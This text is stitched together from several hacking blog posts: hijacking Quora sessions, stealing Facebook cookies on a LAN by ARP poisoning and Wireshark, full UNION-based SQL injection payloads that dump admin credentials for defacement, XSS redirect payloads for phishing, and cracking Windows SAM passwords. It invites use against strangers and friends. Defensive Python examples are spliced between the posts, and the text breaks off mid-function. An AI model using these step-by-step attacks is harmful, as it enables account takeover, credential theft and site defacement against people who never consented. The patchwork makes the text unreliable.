
I found this vulnerability last week and reported it to Quora. They haven't replied yet, so I am assuming it's not a big vulnerability.

Through this method, you will be able to hack and get access to all Quora accounts being used on the LAN. There is also a URL redirect vulnerability, using which you can spam the walls of the linked Facebook accounts of those users. So this is how it goes.

As I was using the Android Quora app on my mobile, I noticed the following. If I go to the profile tab and click on “Inbox”, it takes me to http://www.quora.com/inbox. But before it does that, it first goes to this intermediate link (subsequently I will be calling this the IL):

http://www.quora.com/login/android_login?next=http%253A%252F%252Fwww.quora.com%252Finbox&user=[user-id-here]&b=[something-here]

and then goes to http://www.quora.com/inbox/

On further analysing this link I found that anyone who had access to this IL could access my account. So basically, if I give that link to you, you can put it in your browser and you will be logged into my account; it will not ask you for my login credentials or anything.
The user value is the user ID of any user, and the b value is something unique to each logged-in session; I am guessing something like a session ID.

When you log in to Quora.com in your browser, there is a cookie called “m-b”. If you take that cookie value and put it into the b value in the IL, the link works and it will open your inbox. The user value is the user ID of the user. This can be found out by looking at the URL of the user's Quora profile picture. The URL will be of the form http://qph.is.quoracdn.net/main-thumb-[user-id]-200-VPN8Lywty7hX4ZM4SkYwlUoiNhmiaLyA.jpeg or something like that.

Vulnerability 1:

If you can get the m-b cookie, you basically have access to the victim's account. This is an HttpOnly cookie, so you cannot read it through JavaScript, but since the link is plain HTTP you can always sniff out this cookie using Wireshark, as demonstrated in my previous posts about getting the Facebook cookies through Wireshark. So once you get the cookie value, insert it into the IL with the corresponding user ID and you will get access to the account.

Vulnerability 2 :

If you look at the “next” field in the IL, it contains the URL, doubly URL-encoded.

Any URL can be doubly encoded here: http://meyerweb.com/eric/tools/dencoder/. Just encode the URL twice and put it in the above link.

So if you want to redirect to google.com, the vulnerable link will be

http://www.quora.com/login/android_login?next=http%253A%252F%252Fwww.google.com%252F&user=%5Buser-id here]&b=[mb-cookie value here]

Once the user goes to this link, the page will automatically go to http://www.google.com without any intermediate page.

This is a very serious vulnerability. There is a URL redirection happening from Quora.com to a non-Quora domain. This can be exploited to obtain the Facebook access token of users and further be used to spam the Facebook wall of the victim via the Quora Facebook app. This method has been illustrated very clearly here: http://blog.prakharprasad.com/2013/06/pwning-facebook-accounts-taking-little.html?m=0, and hence I will not show how to do that here.

Hope this was interesting! I am working on a video demonstrating this whole hack, and will upload it once I find some free time.

Till then. Cheers🙂
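The redirect half of this bug is a “next” parameter that the server trusts once it has decoded it. As an added example (my own code, not the post's and not Quora's), here is how a login handler can validate such a parameter: it undoes nested percent-encoding a bounded number of times and then only ever returns a path on its own host. The function names and the host value are assumptions.

```python
# Added example, not Quora's code: validate a "next" redirect parameter so that
# a doubly (or triply) encoded off-site URL is refused instead of followed.
from urllib.parse import unquote, urlsplit

MAX_DECODE_ROUNDS = 3  # bounded, so a crafted value cannot keep us decoding


def fully_decode(value: str) -> str:
    """Undo nested percent-encoding (%253A -> %3A -> ':') up to MAX_DECODE_ROUNDS times."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_next(raw_next: str, own_host: str, default: str = "/") -> str:
    """Return a same-site redirect target derived from raw_next, or `default`.

    Anything that would leave own_host is refused: absolute URLs to other hosts,
    protocol-relative //host URLs, backslash variants, and non-http(s) schemes.
    """
    target = fully_decode(raw_next or "")
    # Browsers treat backslashes as slashes in URLs; normalise before checking so
    # that "/\evil.example" is seen as the protocol-relative URL it really is.
    target = target.replace("\\", "/")
    parts = urlsplit(target)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return default  # javascript:, data:, and friends
    if parts.netloc:
        # Absolute URL: the authority must be exactly our host (no userinfo, no port games).
        if parts.netloc.lower() != own_host.lower():
            return default
        path = parts.path or "/"
    else:
        path = parts.path
    if not path.startswith("/") or path.startswith("//"):
        return default  # relative paths and protocol-relative URLs are refused
    # Rebuild only path and query: scheme and host are never taken from the input.
    return path + ("?" + parts.query if parts.query else "")
```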

This is my new post, about clickjacking! About a month back there was something like a virus on Facebook. It was actually a post which spammed like crazy.

The post was as follows:

This video comes in many forms. One of the other types was a video link titled “OMG this is what happened to his daughter” or some such “catchy” caption. All these spam posts are essentially links which look like videos. The play button is actually an image imitating the YouTube play button. If you view the source code, you can see that it's just an image tag and not a video.

When you click on the play button on the video, it takes you to another website. This website has one of the two following options. In older spam posts, a piece of JavaScript code was displayed, and the page persuaded the user to paste the code into the URL bar to view the video. In newer spam posts, there would be a button which read “Click here to verify you are above 18”. Whenever the user does either of the above, the code indirectly “shares” the post to all their friends. The code essentially imitates the ‘share’ option in Facebook; the user is tricked into doing this.

Analysing this code I can conclude the following. Firstly, the video link shown in the post is actually an image with a hyperlink, not a video. Secondly, on clicking the “verify age” button or pasting the JavaScript, the user shares the post to all his friends. The technical term given to this type of attack is “clickjacking”.

This is what Wikipedia has to say about clickjacking😀: Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. On a clickjacked page, the attackers show a set of dummy buttons, then load another page over it in a transparent layer. The users think that they are clicking the visible buttons, while they are actually performing actions on the hidden page. The hidden page may be an authentic page, and therefore the attackers can trick users into performing actions which the users never intended. There is no way of tracing such actions later, as the user was genuinely authenticated on the other page.

This can be easily found out if one reads through the code of the “verify age” button in the Facebook spam. These types of attacks can be put to more deadly uses on bank websites. When a user who has logged in to his bank account visits a website and clicks on a seemingly harmless link, he may actually be transferring money to some other account without his knowledge.

So what are the ways to prevent clickjacking? As the user of a website, it's very tough to stay away from clickjacking. You should always keep your eyes open for anything malicious. As a website developer, precautions must be taken to prevent this type of attack. The most common way to prevent this attack is to put frame-busting code in the main page like the following: if (top.location != self.location) { top.location = self.location; }
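Header-based framing protection is what a developer should rely on rather than script alone. As an added example (my own code, not from the original post), here is a checker that reads a response's X-Frame-Options and Content-Security-Policy headers and decides whether a given origin may frame the page; the origins used in the test are made up.

```python
# Added example, not the post's code: decide from a page's response headers
# whether some origin is allowed to put it in a frame. Script frame-busters
# like the one above run inside the attacker's frame and are not reliable on
# their own; the browser-enforced controls are X-Frame-Options and, preferably,
# Content-Security-Policy frame-ancestors, which takes precedence when present.
from urllib.parse import urlsplit


def frame_ancestors_sources(csp: str):
    """Return the source list of the frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def source_matches(source: str, framer: str, page: str) -> bool:
    """Match one frame-ancestors source against a framing origin (scheme://host[:port])."""
    f = urlsplit(framer)
    if source == "'none'":
        return False
    if source == "'self'":
        return framer.lower() == page.lower()
    if source == "*":
        return True
    if source.endswith(":") and "/" not in source:  # scheme-source such as https:
        return f.scheme == source[:-1]
    # host-source: [scheme://]host[:port]; the host may start with a "*." wildcard
    s = urlsplit(source if "://" in source else "//" + source)
    if s.scheme and s.scheme != f.scheme:
        return False
    if s.port is not None and s.port != f.port:
        return False
    host = s.hostname or ""
    if host.startswith("*."):
        # *.example.com matches a.example.com but, per CSP, not example.com itself
        return bool(f.hostname) and f.hostname.endswith(host[1:])
    return f.hostname == host


def framing_allowed(headers: dict, framer: str, page: str) -> bool:
    """True if `page`, served with `headers` (any name casing), may be framed by `framer`."""
    h = {k.lower(): v for k, v in headers.items()}
    sources = frame_ancestors_sources(h.get("content-security-policy", ""))
    if sources is not None:
        return any(source_matches(s, framer, page) for s in sources)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer.lower() == page.lower()
    # No header, or an obsolete/unknown value such as ALLOW-FROM: browsers
    # ignore it, so the page can be framed from anywhere.
    return True
```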

If you are interested in developing your own clickjacking page, you can use this tool called the clickjacking tool. It's really cool! It very easily lets you make a site which has a hidden iframe.

Although many attempts are being made to prevent clickjacking on websites, hackers have been developing newer ways to bypass the JavaScript filters put in place. It finally comes down to the developer/security testing team of the website to be vigilant and constantly update themselves on new types of attacks, thus securing the website. Feel free to comment.

Hey!

I'm back with the second part of the post. At the end of the last post, we successfully re-routed all the traffic from the victim's computer to the router through our computer. Next, we have to capture their Facebook cookies through Wireshark. So how do you go about doing that? It's very simple actually.

  • Open up Wireshark.
  • Go to Capture -> Interfaces in the top menu and select your interface. It's usually the one which has an IP address and a certain number of packets flowing through it.
  • Next go to Capture and click on Start. It should look something like this:

This window has all the packets sent from the victim’s/victims’ computer to the router and all the packets sent from the router to the victim.

Next, in the filter, type “http.cookie contains datr”. You ask why? Because when a user logs in to Facebook, he is given some cookies which are unique to him. If we replace our cookies with the victim's cookies, we can log in to his account, as Facebook then won't know the difference.

You now have the cookies. To get the information stored in the cookies, right-click on any one of the cookie packets and click on Follow TCP Stream.

In the TCP stream look for the line Cookie: (followed by all the cookie names). If it doesn't come up, select some other packet in Wireshark and click on Follow TCP Stream for that. You can see the source IP and destination IP in Wireshark. So if you have more than one source IP, then you know you have the cookies of more than one account on your LAN. This is what I got when I did it.

So now you have it😀: the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie. These are the main cookies you need.

Now open Firefox and go to http://www.facebook.com. Once there, click on Cookies in the Web Developer add-on which you installed in the last post. Then do the following:

  • Clear session cookies
  • Delete domain cookies
  • Delete path cookies

IMPORTANT: Once you do this, again type http://www.facebook.com in the URL bar and press Enter. Basically you are reloading Facebook after deleting all cookies.

Now log in to your account with your username and password. After logging in, click on Cookies in the Web Developer add-on and click on “View Cookie Information”.

And there you have all your cookies :p. Now what to do?! I guess you know it by now!

Click on “Edit Cookie” for each cookie there and replace the cookie value with the value you got through Wireshark.

If you did not get all the cookies in Wireshark, it's OK! But mainly, you should look to replace the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie.


After replacing all the cookie values with the ones you got in Wireshark, just refresh the Facebook page. And that's it! You are into the victim's account! You have HACKED a Facebook account on the LAN. :D

<o.w.n.e.d>  + <p.w.n.e.d>

So until my next post, sayonara and happy hacking!🙂
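What makes this replay possible is that the cookies travel in the clear and are accepted without any binding to the connection. As an added example (my own code, not from the original post), here is an audit of Set-Cookie headers for the attributes that close that gap; the sample headers are constructed, not captured from Facebook.

```python
# Added example, not from the original post: audit Set-Cookie headers for the
# attributes that defeat what this post does. "Secure" stops the browser ever
# sending the cookie over plain HTTP, so there is nothing for Wireshark to see
# on the LAN; "HttpOnly" keeps it out of reach of page script; "SameSite"
# limits cross-site replay. The sample headers below are constructed.


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie value into name, value and a lower-cased attribute map."""
    pieces = [p.strip() for p in header.split(";")]
    name, _, value = pieces[0].partition("=")
    attrs = {}
    for piece in pieces[1:]:
        key, _, val = piece.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value, "attrs": attrs}


def audit_cookie(header: str) -> list:
    """Return human-readable findings; an empty list means the cookie is set safely."""
    cookie = parse_set_cookie(header)
    attrs, name = cookie["attrs"], cookie["name"]
    findings = []
    if "secure" not in attrs:
        findings.append(f"{name}: no Secure flag, sent in clear over HTTP (sniffable)")
    if "httponly" not in attrs:
        findings.append(f"{name}: no HttpOnly flag, readable by page script")
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        findings.append(f"{name}: SameSite not Lax/Strict, sent on cross-site requests")
    return findings


# Constructed sample headers: one set the weak way, one the way it should be.
SAMPLE_SET_COOKIE_HEADERS = [
    "c_user=100000123456; expires=Fri, 01 Jan 2027 00:00:00 GMT; path=/; domain=.example.com",
    "xs=2%3Aabc123; path=/; domain=.example.com; Secure; HttpOnly; SameSite=Lax",
]


def audit_all(headers=SAMPLE_SET_COOKIE_HEADERS) -> dict:
    """Map each cookie name to its findings."""
    return {parse_set_cookie(h)["name"]: audit_cookie(h) for h in headers}
```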

My blog has 10k hits right now. Glad to see so many people visiting the blog.
OK, so in this post I am going to show you a way you can hack the Facebook accounts of all the people who are on your network (LAN or Wi-Fi). I have tried this and believe me it works. This is really the best way to hack Facebook accounts. It's much easier than installing RATs or keyloggers or making phishing sites. OK, so off we go!

You will need 3 programs for this:

Cain and Abel: http://www.oxid.it/cain.html
Wireshark: http://www.wireshark.org/download.html
Web Developer add-on for Firefox: https://addons.mozilla.org/en-US/firefox/addon/web-developer/

So what exactly happens when you type in http://www.facebook.com and log in with your username and password? First download the Web Developer add-on for Firefox and then log in to Facebook. After you log in, view the cookies in the Web Developer toolbar.

OK, now if you click on View Cookie Information, you will be able to see all the cookies which Facebook has transmitted to your browser.

The main cookies are the c_user cookie (which identifies a person uniquely) and the datr cookie.

So your aim must be to get the cookies of your victim through Wireshark and then replace your cookies with the victim's. Facebook will then think you are the victim, as you have his cookies, and you will be logged in as the victim. Simple, isn't it?😛

So how do you do this?

First off, install Cain and Abel. It will ask you whether you want to install the packet driver, WinPcap. Go ahead and install that also. Open up Cain.

  • Click on Configure at the top and select your network card. Mostly it's the one with an IP address :p
  • Next click on the Start/Stop Sniffer button at the top, as shown below in the green square.
  • Once you start the sniffer, go to the Sniffer tab in Cain, right-click and click Scan MAC Addresses as shown below!

OK, now you should have a list of everyone on the network. It may take some time though. You can right-click on any one computer and find out its name.

Now what we are going to do is the actual shit! We are going to do an ARP poison! What this means is that you fool the router into thinking that you are the victim, and you fool the victim into thinking that you are the router.

So initially victim -> router -> Facebook. Now after the ARP poison, victim -> hacker -> router. This is called an MITM (man-in-the-middle) attack. You can Google it for more info :p

Doing the ARP poison

  • First click the APR tab at the bottom in Cain.
  • Click the white area in the top frame.
  • Click the blue plus at the top.

Now you should get a list of all the devices on the left and a blank screen on the right.

In the left screen you should select the router IP. And in the right box, select the computers you want to target. To be safe it's better to target one computer. But if you want some real fun then select all the computers in the right frame😀. Press OK.

WARNING: If there is a person at the router, he can tell that you have just done an ARP poison. But where is the fun without the risk? :P

You can try Googling for other methods to do an ARP poison safely.

In the top frame the computer list should now have been filled in. Now select the whole list and click on the nuclear button (top left of Cain).


That's it, you are done with the ARP poison. Just be careful: if you select too many computers, your computer can't handle the traffic and the network may just crash. I am reminding you, this should be done for ethical reasons!

Now all the data is passing through your computer. All you have to do is sniff the data in Wireshark, get the cookie and replace your cookie with the victim's cookie.

That's what I'll be covering in part 2 of this post, hopefully in a day or two. Till then, cheers!🙂
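The warning above is right: an ARP poison is visible to anyone watching the LAN. As an added example (my own code, not from the original post), here is the detection logic a network owner can run over ARP replies; the packet records are constructed and would in practice come from a capture filtered on ARP.

```python
# Added example, not from the original post: spot the ARP poisoning described
# above from the defender's side. A poisoned LAN shows the gateway IP being
# claimed by a second MAC (the attacker's), and usually one MAC claiming several
# IPs at once. The records below are constructed ARP "is-at" replies.
from collections import defaultdict

# Each record: (timestamp, sender_ip, sender_mac) from an ARP reply on the wire.
SAMPLE_ARP_REPLIES = [
    ("10:00:01", "192.168.1.1", "aa:bb:cc:00:00:01"),   # the real gateway
    ("10:00:02", "192.168.1.20", "aa:bb:cc:00:00:20"),
    ("10:00:03", "192.168.1.30", "aa:bb:cc:00:00:30"),
    ("10:00:10", "192.168.1.1", "aa:bb:cc:00:00:30"),   # host .30 now claims to be the gateway
    ("10:00:10", "192.168.1.20", "aa:bb:cc:00:00:30"),  # ... and also claims to be .20
]


def detect_arp_spoof(replies, gateway_ip: str) -> list:
    """Return alerts: IPs whose MAC changed (gateway rated HIGH) and MACs holding several IPs."""
    ip_history = defaultdict(list)   # ip -> MACs seen for it, in order
    mac_to_ips = defaultdict(set)    # mac -> IPs it has claimed
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        seen = ip_history[ip]
        if seen and seen[-1] != mac:
            severity = "HIGH" if ip == gateway_ip else "MEDIUM"
            alerts.append(f"{ts} {severity}: {ip} moved from {seen[-1]} to {mac}")
        if not seen or seen[-1] != mac:
            seen.append(mac)
        mac_to_ips[mac].add(ip)
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts


def suspect_macs(replies, gateway_ip: str) -> set:
    """MACs that claimed the gateway IP after a different MAC already held it."""
    first_holder, suspects = None, set()
    for _, ip, mac in replies:
        if ip != gateway_ip:
            continue
        mac = mac.lower()
        if first_holder is None:
            first_holder = mac
        elif mac != first_holder:
            suspects.add(mac)
    return suspects
```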

What is SQL Injection?

SQL is Structured Query Language. This language is used to work on a database. Commands such as SELECT, INSERT and DELETE are used to read and update information in the database.

In this type of attack, we make use of a vulnerability where we supply our own commands to the website's database and successfully deface it😀. This vulnerability occurs when the user's input is not filtered, or is improperly filtered.

Step 1: Looking for the Vulnerability

www.something.com/news/news.php?id=130

The above URL can be vulnerable to SQL injection. The script is taking the ID as 130 and returning some values. To see if the URL is vulnerable, put a ' at the end of the URL. So try this URL:

www.something.com/news/news.php?id=130'

Now if you get an error saying something like it's not a valid MySQL statement, then it is possible to exploit this URL. Example: when I did it on a website vulnerable to this exploit, I got the following:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

One more thing: if the URL ends in .php?catid=x, where x is a number, you can use this same method to see if the site is vulnerable.

So now you know whether a website is vulnerable or not, but how do you find websites which are vulnerable? Easy! You use a Google dork to do this. So you are going to use Google to find vulnerable websites. Type the following in Google:

1. inurl:.php?id=

2. inurl:.php?catid=

So now you will get a list of websites. Test them one by one with the method mentioned above to see if they are vulnerable.

Step 2: Exploiting the vulnerability

This tutorial is only for educational purposes. Kindly do not misuse it.

You have a vulnerable URL:

www.something.com/news/news.php?id=130

OK, now how do you deface it?

Finding number of columns

Now put the following in the URL:

http://www.something.com/news/news.php?id=130 order by 10--

Now we told the database to order the result by the 10th column. Your job is to find how many columns there are in the table. So if order by 10 gave you an error, replace 10 by 9 and try it. Or if 10 gave a valid reply, put 11 and try.

Also, the -- (two dashes) at the end means “comment”. So anything after it is commented out and only our query is executed.

So assume I got an error for order by 10, then I tried order by 9 and so on. Finally I got no error at 6 and an error at 7. Hence, the table has 6 columns.

Find Vulnerable columns

Now we will use union all and select to find a vulnerable column. Remember to replace that ID number by its negative. Like here, I have made it id=-130.

http://www.something.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--

Since it has 6 columns, we do select all 1,2,3,4,5,6 and -- at the end.

This will give an output. Whichever column number comes out as bold in the output, that column is vulnerable. Just remember this column number. Assume I got 2 as the vulnerable column.

Finding tables

Now our job is to find the different tables in the database. We do the following:

http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--

Here group_concat(table_name) will give you all the table names in the database. information_schema holds information about the database, so we are just querying that.

Finding Column names

Similarly, get all the columns by simply replacing ‘table’ with ‘column’:

http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--

Now you will be able to find all the column names from all the tables. After all the columns from one table, there will be an “id” and then all the columns from the next table, and so on.

If this doesn't work then you can do:

http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name="some table you got from the previous step"--

Final Step

Now in the list of columns look for some interesting columns like username or password. So now you should know the table name and column names you want, e.g. the username and password columns from the tbl_admin table:

http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tbl_admin--

Now I just put the column names in the group_concat with 0x3a in between, which is ASCII for a colon, and tbl_admin is the table name where these columns are.

Now I got output something like:

admin:”encrypted hash”,user2:”encrypted hash”, and so on…

So usernames are not encrypted here, and passwords are encrypted.

So your job is almost done. Now you will get all the users and passwords. Usually the passwords will be MD5 hashes. You can “decrypt” them by looking them up; just use Google😛.

Defacing

Now you have the admin username and admin password from the previous step. Now you have to find the admin page of the site.

Go to http://tools.th3-0utl4ws.com/admin-finder/ and put in your website there.

It will give you the admin page after some time.

Mine turned out to be  http://www.something.com/admin

So here you get a login box. Put in the username and password of the admin and that's it. You are in😀

Now do whatever you want, like defacing or deleting tables etc.
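Every step above works only because the id parameter is pasted straight into the SQL text. As an added example (my own code, not from the original post), here is that bug recreated in Python with sqlite3 so it runs offline, next to the parameterised fix, plus a small request-log detector for the probe strings this tutorial walks through. The table, rows and request paths are constructed.

```python
# Added example, not from the original post: the bug behind news.php?id=...
# recreated with sqlite3, next to the fixed version, plus a detector for the
# probe strings the post walks through. Table, rows and paths are constructed.
import re
import sqlite3
from urllib.parse import unquote_plus


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE news (id INTEGER, title TEXT);"
        "INSERT INTO news VALUES (130, 'Public story');"
        "INSERT INTO news VALUES (131, 'Unpublished draft');"
    )
    return db


def news_vulnerable(db, raw_id: str) -> list:
    """The original mistake: the id parameter is concatenated into the SQL text."""
    return db.execute("SELECT title FROM news WHERE id=" + raw_id).fetchall()


def news_safe(db, raw_id: str) -> list:
    """Validate the shape of the input, then bind it; it can never become SQL."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    return db.execute("SELECT title FROM news WHERE id=?", (int(raw_id),)).fetchall()


def safe_rejects(db, raw_id: str) -> bool:
    """True when news_safe refuses raw_id (used below to show the fix holds)."""
    try:
        news_safe(db, raw_id)
    except ValueError:
        return True
    return False


# Request-log signatures of the post's steps: the quote probe, ORDER BY n--,
# UNION SELECT, and information_schema / group_concat enumeration.
PROBE_PATTERNS = [
    ("quote-probe", re.compile(r"[?&]id=\d+'")),
    ("order-by", re.compile(r"order\s+by\s+\d+\s*--", re.I)),
    ("union-select", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("schema-enum", re.compile(r"information_schema|group_concat", re.I)),
]


def classify_request(path: str) -> list:
    """Names of the probe patterns found in one request path (URL-decoded first)."""
    decoded = unquote_plus(path)
    return [name for name, rx in PROBE_PATTERNS if rx.search(decoded)]
```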

There is a reason I have not told you what something.com is. You can use the Google dorks I mentioned to find any vulnerable site.

This tutorial is only for educational purposes. Kindly do not misuse it. I am not responsible for anything.

Any comments/feedback is appreciated.

XSS: Cross-Site Scripting

Finally! I have time to write this post. This post is about XSS, Cross-Site Scripting.

So what is XSS? It's basically a way of injecting script into a web page so that, for example, the user is redirected to another page without knowing about it.

There are 2 types of XSS: reflective and stored.

Reflective XSS:

This is the most common type of XSS. In this case the code is not stored on the server side.

Let me show you a demo of this. Let us assume there exists a web page with a search box in it, e.g. http://www.search.com/


Now type anything in the box and look at the URL. If I type “hacking”, the URL becomes as follows:

Now in the URL, you can see q=hacking. Also look at the source code of the green box highlighted above. It is as follows:

<input type="text" id="searchbox" value="hacking">

Now suppose this website is vulnerable to XSS. If we make the URL

http://www.search.com/search?q="><script>alert("hacked")</script>

the HTML code of the box would become as follows:

<input type="text" id="searchbox" value=""><script>alert("hacked")</script>

Now what has happened is that we have manually closed the input box and written our own script tag. So if you give this link to someone then “hacked” would pop up on the screen. This is not very risky as of now. But what if we change the value to "><script>document.location="http://www.yoursite.com"</script>

Now when you give this link to someone, they will actually go to http://www.yoursite.com, thus fooling the user :p

The following is a POC (proof of concept).

In this case it is going to go to http://www.yahoo.com even though the URL starts with http://www.google.com. You can also encode the URL so that the user doesn't see the last part of it. You can learn how to do that here: http://pc-help.org/obscure.htm

You can go to http://www.xssed.com and check out the XSS vulnerabilities in all the listed websites and use them to your advantage.

E.g. you can make a phishing site of Gmail and give the victim a link http://www.google.com/(link which is vulnerable to XSS) which will redirect the user to your phishing site. The user won't know, as he will mostly see the starting part of the URL, and thus he is fooled. You can't use the above link (given for the POC) for your phishing page :p Guess why!

Try using some other XSS vulnerability from xssed.com, or try finding your own XSS vulnerability on some website.

STORED XSS

In this type of XSS, the malicious code is stored on the server. E.g. take the case of a guest book which takes user input, stores it in a database and displays it to other users. If the code is “buggy”, a hacker can insert JavaScript there so that every time any user opens that page, the script is executed without the user knowing.

Reflective XSS is more common on the internet, as developers are more careful when something is being written to the server database :p
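Both kinds come down to the same thing at render time: the search box's value attribute is the injection point, so the fix is to escape for that context before interpolating. As an added example (my own code, not from the original post), here is the search box rendered the vulnerable way and the fixed way, parsed back to show the difference; the page markup and payload are the post's own.

```python
# Added example, not from the original post: the search box from the post,
# rendered the vulnerable way (raw interpolation) and the fixed way (escaping
# for the HTML attribute context), then parsed back to show the difference.
# The same escaping applies to stored XSS: what matters is the output context,
# not whether the string came from the URL or from the database.
import html
from html.parser import HTMLParser

# The post's own payload: closes the value attribute, then opens a script tag.
PAYLOAD = '"><script>alert("hacked")</script>'


def render_vulnerable(q: str) -> str:
    """What the vulnerable search page effectively did: the query lands in the attribute as-is."""
    return '<input type="text" id="searchbox" value="' + q + '">'


def render_safe(q: str) -> str:
    """quote=True turns " and ' into entities, so the attribute cannot be closed early."""
    return '<input type="text" id="searchbox" value="' + html.escape(q, quote=True) + '">'


class TagCollector(HTMLParser):
    """Records every start tag seen, and the attributes of the input element."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_attrs = dict(attrs)


def parse(rendered: str) -> TagCollector:
    """Parse rendered markup the way a browser would tokenise it."""
    collector = TagCollector()
    collector.feed(rendered)
    collector.close()
    return collector
```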

Interesting Info

XSS is a very dangerous vulnerability. Bank websites take the utmost care to see that their code is not vulnerable to XSS, as they are the most targeted. Just imagine if a bank URL redirected to some hacker's phishing page. All the user's details are lost!

The best video tutorial on XSS is here: http://infinityexists.com/videos/episode13/. You can either watch it online or download it.

The toughest part about XSS is finding a vulnerable piece of code and filter evasion. Many sites have code such that malicious code is filtered out of the user input, so the thrill is in finding a way to evade this filter!

This link is also very good, once you get the hang of XSS: http://ha.ckers.org/xss.html

My favourite exploit of XSS was the MySpace worm created by a teenager, Samy Kamkar!

Samy's MySpace worm did three silly things: it added Samy to the visitor's friends list (anyone who visited his profile became his friend); it printed “. . . and Samy is my hero” at the bottom of the visitor's own profile; and it replicated itself to everyone on the visitor's friends list. You can read about it here: http://namb.la/popular/tech.html

Hacking a Windows password is very simple. It just takes a little bit of time. But with the proper tools, you can crack it in 5 minutes max.

For this to work, you need to have physical access to the computer you are trying to hack into.

Once you get this access, the password can be hacked in 2 ways:

  1. Using the Ophcrack live CD.
  • First off go to http://ophcrack.sourceforge.net/ and click on Download ophcrack Live CD.
  • Download the correct version of the ISO. If you want to crack a Windows XP password get “ophcrack XP live CD”; if you want to crack a Windows Vista/Windows 7 password get the “ophcrack vista live cd”.
  • Next you have to burn the ISO onto a CD. I recommend using Free Easy CD Burner from http://download.cnet.com/Free-Easy-CD-DVD-Burner/3000-2646_4-10627009.html. It's fast and efficient.
  • Next, go to the computer you want to crack and pop in the live CD. In the boot menu, select the CD option and boot from the CD.
  • Now after it loads, it will crack the password and display it to you.

Ophcrack is very good password-cracking software, but if the password is very long or complicated, then it will not be able to crack it. Ophcrack uses rainbow tables (http://en.wikipedia.org/wiki/Rainbow_table) to crack the passwords, so it is much faster than normal brute force.

  2. Using a cracker such as Cain and Abel. I personally like this method a lot...

From the computer you want to crack into, you need to get 2 files: the SAM file and the SYSTEM file. No rebooting and all that. This is very convenient if you want to hack your friend's computer or something :p

The SAM and SYSTEM files are located in “C:\windows\system32\config”. The problem is that these files are locked while Windows is running and hence cannot be copied.

If you want to crack a Windows XP password, then you are in luck, as Windows also stores a backup of SAM and SYSTEM in “C:\windows\repair”. So you can copy these files from there.

But if you want to crack a Windows Vista/7 password, you have to boot the computer from the live CD of another OS such as Ubuntu, and then copy SAM and SYSTEM from “C:\windows\system32\config”.

Once you get these files, cracking is very easy.

  • Download Cain and Abel from http://www.oxid.it/cain.html.
  • Install it and then run it. Ignore any warnings which come up.
  • Click on the Cracker tab at the top. Next click on the BLUE PLUS mark to add the hashes from SAM and SYSTEM.
  • Click on Import Hashes from SAM Database.
  • For the SAM filename, click on Browse and select the SAM file you got from the computer you want to crack.
  • For the boot key (HEX), select the SYSTEM file.
  • Now, if all went well, you should be able to see all the users in the SAM database.
  • You can right-click on any username and crack its password.


You can select the right type of cracking by looking at the hash type in the table (LM or NTLM or both).

A dictionary attack will try all words from a given wordlist. Wordlists are plentiful and can be found on Google.

A brute-force attack is just crazy, unless the password is very lame.

A cryptanalysis attack is very good, and the best type of attack. For this, you will need to download the rainbow tables. Check Google for the rainbow tables; it's a pretty big download. After it completes you can use the cryptanalysis attack with the rainbow tables. There are different rainbow tables available for Windows XP and Windows Vista/7, so depending on the OS you want to crack, download the correct version. Cheers!
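The rainbow tables above and the “just use Google” MD5 lookups in the SQL injection post work for the same reason: the stored hash is unsalted and fast, so one precomputed table serves every user and every site. As an added example (my own code, not from either post), here is that lookup in miniature next to the defence that breaks it, a random per-user salt and a slow key derivation; the wordlist is constructed and tiny.

```python
# Added example, not from either post: why an unsalted MD5 (or LM/NTLM) hash
# can be "decrypted" by a lookup and why rainbow tables work, and the defence
# that breaks both: a random per-user salt plus a slow KDF, so no precomputed
# table can be reused across users or sites. The wordlist is constructed.
import hashlib
import hmac
import os

WORDLIST = ["password", "letmein", "qwerty", "hunter2"]  # constructed, tiny
PBKDF2_ROUNDS = 200_000


def md5_hex(password: str) -> str:
    """The unsalted, fast hash the SQL injection post found in the users table."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup_table(words) -> dict:
    """hash -> password, computed once and reusable against every unsalted database;
    a rainbow table is the same idea with the storage compressed."""
    return {md5_hex(w): w for w in words}


def lookup_unsalted(stored_hex: str, table: dict):
    """Recovering an unsalted hash is a single dictionary read, no per-user work."""
    return table.get(stored_hex)


def hash_salted(password: str, salt: bytes = b"") -> str:
    """PBKDF2-HMAC-SHA256 with a fresh 16-byte salt; stored as 'salt_hex$hash_hex'."""
    salt = salt or os.urandom(16)
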